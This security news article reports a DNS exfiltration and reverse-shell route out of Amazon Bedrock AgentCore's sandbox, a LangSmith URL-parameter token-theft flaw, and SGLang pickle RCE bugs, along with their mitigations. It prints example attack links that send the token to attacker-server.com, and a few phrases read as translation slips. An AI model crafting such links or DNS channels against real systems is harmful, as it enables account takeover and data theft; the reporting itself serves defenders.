Cybersecurity researchers have revealed details of a new method of exfiltrating sensitive data from artificial intelligence (AI) code execution environments using Domain Name System (DNS) queries.
In a report published Monday, BeyondTrust revealed that the sandbox mode of the Amazon Bedrock AgentCore code interpreter allows outbound DNS queries that an attacker could use to enable an interactive shell and bypass network isolation. This issue, which does not have a CVE identifier, holds a CVSS score of 7.5 out of 10.0.
Amazon Bedrock AgentCore Code Interpreter is a fully managed service that enables AI agents to securely execute code in isolated sandbox environments, such that agentic workloads cannot access external systems. It was launched by Amazon in August 2025.
The fact that the service allows DNS queries despite a “no network access” configuration “could allow threat actors to establish command-and-control channels and data exfiltration over DNS in some scenarios, bypassing expected network isolation controls,” said Kinnard McQuade, chief security architect at BeyondTrust.
In an experimental attack scenario, a threat actor could abuse this behavior to establish a bidirectional communication channel using DNS queries and responses, obtain an interactive reverse shell, exfiltrate sensitive information via DNS queries if their IAM role has permissions to access AWS resources such as the S3 bucket that stores that data, and execute commands.
Additionally, the DNS communication mechanism can be abused to deliver additional payloads fed to the code interpreter, allowing it to poll DNS command-and-control (C2) servers for commands stored in DNS A records, execute them, and return results via DNS subdomain queries.
It’s worth noting that the code interpreter requires the IAM role to access AWS resources. However, a simple oversight can lead to a service being assigned a highly privileged role, giving it broad permissions to access sensitive data.
BeyondTrust said, “This research demonstrates how DNS resolution can weaken the network isolation guarantees of sandboxed code interpreters.” “Using this method, attackers can exfiltrate sensitive data from AWS resources accessible through the IAM role of the code interpreter, potentially causing downtime, a data breach or deleted infrastructure of sensitive customer information.”
Following responsible disclosures in September 2025, Amazon determined this to be intended functionality rather than a defect, urging customers to use VPC mode instead of sandbox mode for complete network isolation. The tech giant is also recommending the use of a DNS firewall to filter outbound DNS traffic.
“To protect sensitive workloads, administrators should inventory all active AgentCore Code Interpreter instances and immediately migrate those handling critical data from sandbox mode to VPC mode,” said Jason Sorocco, senior partner at Sectigo.
“Operating within a VPC provides the necessary infrastructure for strong network isolation, allowing teams to implement strict security groups, network ACLs, and Route53 resolver DNS firewalls to monitor and block unauthorized DNS resolution. Finally, security teams should rigorously audit the IAM roles associated with these interpreters, strictly following the principle of least privilege to restrict the blast radius of any potential compromise. Should be implemented from.”
Langsmith vulnerable to account takeover flaw
The disclosure comes after Miggo Security disclosed a high-severity security flaw in LangSmith (CVE-2026-25750, CVSS score: 8.5), putting users at risk of potential token theft and account takeover. The issue, which affects both self-hosted and cloud deployments, has been addressed in LangSmith version 0.12.71, released in December 2025.
This vulnerability is described as a case of URL parameter injection resulting from a lack of validation on base URL parameters, which enables an attacker to steal a signed-in user’s bearer token, user ID, and workspace ID transmitted to a server under their control via social engineering techniques, such as tricking a victim into clicking a specially crafted link like the one below –
- Cloud – Smith.Langchain[.]com/studio/?baseUrl=https://attacker-server.com
- Self-Hosted –
/studio/?baseUrl=https://attacker-server.com
Successful exploitation of the vulnerability could allow an attacker to gain unauthorized access to an AI’s trace history, as well as expose internal SQL queries, CRM customer records, or proprietary source code by reviewing tool calls.
“A logged-in Langsmith user could be compromised simply by accessing an attacker-controlled site or clicking on a malicious link,” said Miggo researchers Liad Eliyahu and Eliana Vuijsje.
“This vulnerability is a reminder that AI observation platforms are now critical infrastructure. As these tools prioritize developer flexibility, they often inadvertently bypass security guardrails. This risk is heightened because, like ‘traditional’ software, AI agents have deep access to internal data sources and third-party services.”
Unsafe pickle deserialization flaw in SGLang
Security vulnerabilities have also been identified in SGLang, a popular open-source framework for serving large language models and multimodal AI models, which, if successfully exploited, could trigger unsafe pickle deserialization, potentially resulting in remote code execution.
The vulnerabilities, discovered by Orca security researcher Igor Stepansky, have not been fixed at the time of writing. Brief description of the defects is as follows –
- CVE-2026-3059 (CVSS Score: 9.8) – An unauthenticated remote code execution vulnerability through the ZeroMQ (aka ZMQ) broker, which deserializes untrusted data using pickle.loads() without authentication. This affects the multimodal generation module of SGLang.
- CVE-2026-3060 (CVSS Score: 9.8) – An unauthenticated remote code execution vulnerability through the disassembly module, which deserializes untrusted data using pickle.loads() without authentication. This affects SGLang’s encoder parallel separation mechanism.
- CVE-2026-3989 (CVSS Score: 7.8) – Use of an insecure pickle.load() function without validation and proper deserialization in SGlang’s “replay_request_dump.py”, which can be exploited by providing a malicious pickle file.
“The first two allow unauthenticated remote code execution against any SGlang deployment that exposes its multimodal generation or separation features in the network,” Stepanski said. “The third involves unsafe deserialization in the crash dump replay utility.”
In a coordinated advisory, the CERT Coordination Center (CERT/CC) said that SGLang is vulnerable to CVE-2026-3059 when the multimodal generation system is enabled and to CVE-2026-3060 when the encoder parallel disaggregation system is enabled.
“If either condition is met and an attacker knows the TCP port on which the ZMQ broker is listening and can send requests to the server, they can exploit the vulnerability by sending a malicious pickle file to the broker, which will then deserialize it,” CERT/CC said.
Users of SGLang are advised to restrict access to the service interface and ensure that they are not exposed to untrusted networks. It is also advised to implement adequate network segmentation and access controls to prevent unauthorized interactions with ZeroMQ endpoints.
Although there is no evidence that these vulnerabilities have been exploited in the wild, it is important to monitor for unexpected inbound TCP connections to the ZeroMQ broker port, unexpected child processes spawned by the sglang Python process, file creation in unusual locations by the sglang process, and outbound connections from the sglang process to unexpected destinations.